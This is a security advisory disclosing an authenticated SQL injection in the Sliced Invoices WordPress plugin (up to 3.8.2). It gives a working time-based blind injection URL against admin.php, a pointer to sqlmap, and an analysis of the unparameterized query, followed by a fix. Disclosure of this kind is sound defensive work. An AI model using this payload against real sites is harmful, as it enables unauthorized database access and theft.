Wordpress Sliced Invoices <= 3.8.2 Authentificated SQL Injection

Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS due to the use of the same GET parameter.

Intial submission of the vulnerability

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

Detailed analysis of the vulnerability

Under wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php at line number 2202 we can observe the use of non parameterized queries using $wpdb->get_results() with user-supplied data:

$post_meta_infos =  ("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");

Where the $post_id variable is assigned on line 2154 as:

/*
* get the original post id
*/
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);

This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 where example.com is your target. To retrieve more data you can use the sqlmap tool over the affected target URL.

How to fix

Update to the latest available version of the Sliced Invoices plugin.

Public appearances

Other references